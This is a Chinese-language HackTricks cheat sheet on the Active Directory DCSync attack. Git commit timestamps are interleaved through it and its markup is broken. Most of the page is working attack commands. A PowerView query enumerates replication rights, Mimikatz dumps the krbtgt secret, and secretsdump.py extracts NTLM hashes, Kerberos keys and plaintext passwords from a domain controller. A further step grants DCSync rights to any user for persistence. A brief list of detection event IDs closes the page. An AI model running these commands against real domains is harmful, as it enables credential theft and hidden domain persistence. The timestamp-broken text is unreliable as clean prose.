2022-08-31 22:35:39 +00:00
# DCSync
2024-03-29 21:06:45 +00:00
< figure > < img src = "../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
2024-02-08 04:42:06 +00:00
\
2024-03-29 21:06:45 +00:00
使用 [**Trickest** ](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks ) 可以轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
2023-08-03 19:12:22 +00:00
立即获取访问权限:
2022-04-28 16:01:33 +00:00
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}
2022-04-28 16:01:33 +00:00
< details >
2024-03-29 21:06:45 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-08 04:42:06 +00:00
支持 HackTricks 的其他方式:
2024-01-02 22:21:01 +00:00
2024-03-29 21:06:45 +00:00
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群组** ](https://t.me/peass ) 或在 **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )** 上关注我们**。
2024-02-26 10:41:26 +00:00
* 通过向 [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github 仓库提交 PR 来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2022-08-31 22:35:39 +00:00
## DCSync
2022-04-28 16:01:33 +00:00
2024-02-08 04:42:06 +00:00
**DCSync** 权限意味着对域本身具有以下权限:**DS-Replication-Get-Changes**、**Replicating Directory Changes All** 和 **Replicating Directory Changes In Filtered Set** 。
2020-07-15 15:43:14 +00:00
2024-02-08 04:42:06 +00:00
**关于 DCSync 的重要说明:**
2020-07-15 15:43:14 +00:00
2024-03-29 21:06:45 +00:00
* **DCSync 攻击模拟域控制器的行为, 并要求其他域控制器使用目录复制服务远程协议( MS-DRSR) 复制信息**。由于 MS-DRSR 是 Active Directory 的有效且必要功能,因此无法关闭或禁用。
2024-02-08 04:42:06 +00:00
* 默认情况下,只有 **域管理员、企业管理员、管理员和域控制器** 组具有所需的特权。
* 如果任何帐户密码以可逆加密方式存储, Mimikatz 中有一个选项可以返回明文密码
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 枚举
2020-07-15 15:43:14 +00:00
2024-02-08 04:42:06 +00:00
使用 `powerview` 检查具有这些权限的用户:
2022-10-05 20:40:19 +00:00
```powershell
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
2020-07-15 15:43:14 +00:00
```
2023-08-03 19:12:22 +00:00
### 本地利用
2022-10-05 20:40:19 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```
2023-08-03 19:12:22 +00:00
### 远程利用
2022-10-05 20:40:19 +00:00
```powershell
secretsdump.py -just-dc < user > :< password > @< ipaddress > -outputfile dcsync_hashes
[-just-dc-user < USERNAME > ] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
[-history] #To dump password history, may be helpful for offline password cracking
2021-10-08 06:05:56 +00:00
```
2024-01-10 06:29:36 +00:00
`-just-dc` 生成3个文件:
2021-10-08 06:05:56 +00:00
2024-02-26 10:41:26 +00:00
* 一个包含 **NTLM哈希值** 的文件
* 一个包含 **Kerberos密钥** 的文件
* 一个包含启用了[**可逆加密**](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption)的NTDS中的明文密码的文件。您可以使用以下命令获取启用了可逆加密的用户:
2022-10-05 20:40:19 +00:00
2023-08-03 19:12:22 +00:00
```powershell
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
```
2020-07-15 15:43:14 +00:00
2023-09-03 18:16:18 +00:00
### 持久性
2020-07-15 15:43:14 +00:00
2024-03-29 21:06:45 +00:00
如果您是域管理员,可以使用 `powerview` 将此权限授予任何用户:
2022-10-05 20:40:19 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose
```
2024-03-29 21:06:45 +00:00
然后,您可以**检查用户是否已正确分配**这3个特权, 通过在输出中查找它们( 您应该能够在"ObjectType"字段中看到特权的名称):
2022-10-05 20:40:19 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}
```
2023-08-03 19:12:22 +00:00
### 缓解措施
2020-07-15 15:43:14 +00:00
2024-03-29 21:06:45 +00:00
* 安全事件 ID 4662( 必须启用对象的审核策略) – 对对象执行了操作
* 安全事件 ID 5136( 必须启用对象的审核策略) – 修改了目录服务对象
* 安全事件 ID 4670( 必须启用对象的审核策略) – 更改了对象的权限
2024-02-08 04:42:06 +00:00
* AD ACL Scanner - 创建和比较 ACL 的创建报告。[https://github.com/canix1/ADACLScanner](https://github.com/canix1/ADACLScanner)
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
## 参考资料
2022-10-05 20:40:19 +00:00
* [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync ](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync )
* [https://yojimbosecurity.ninja/dcsync/ ](https://yojimbosecurity.ninja/dcsync/ )
2022-04-28 16:01:33 +00:00
< details >
2024-02-08 04:42:06 +00:00
< summary > < strong > 从零开始学习 AWS 黑客技术,成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS 红队专家)< / strong > < / a > < strong > ! < / strong > < / summary >
2024-01-02 22:21:01 +00:00
2024-02-08 04:42:06 +00:00
支持 HackTricks 的其他方式:
2022-04-28 16:01:33 +00:00
2024-03-29 21:06:45 +00:00
* 如果您想在 HackTricks 中看到您的 **公司广告** 或 **下载 PDF 版本的 HackTricks** ,请查看 [**订阅计划** ](https://github.com/sponsors/carlospolop )!
* 获取 [**官方 PEASS & HackTricks 商品** ](https://peass.creator-spring.com )
* 探索 [**PEASS 家族** ](https://opensea.io/collection/the-peass-family ),我们的独家 [**NFT** ](https://opensea.io/collection/the-peass-family ) 收藏品
* **加入** 💬 [**Discord 群组** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群组** ](https://t.me/peass ) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**。**
2024-03-17 16:19:28 +00:00
* 通过向 [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github 仓库提交 PR 来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-03-29 21:06:45 +00:00
< figure > < img src = "../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
\
2024-03-29 21:06:45 +00:00
使用 [**Trickest** ](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks ) 可以轻松构建和 **自动化** 工作流,使用世界上 **最先进** 的社区工具。\
2023-08-03 19:12:22 +00:00
立即获取访问权限:
2022-04-28 16:01:33 +00:00
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}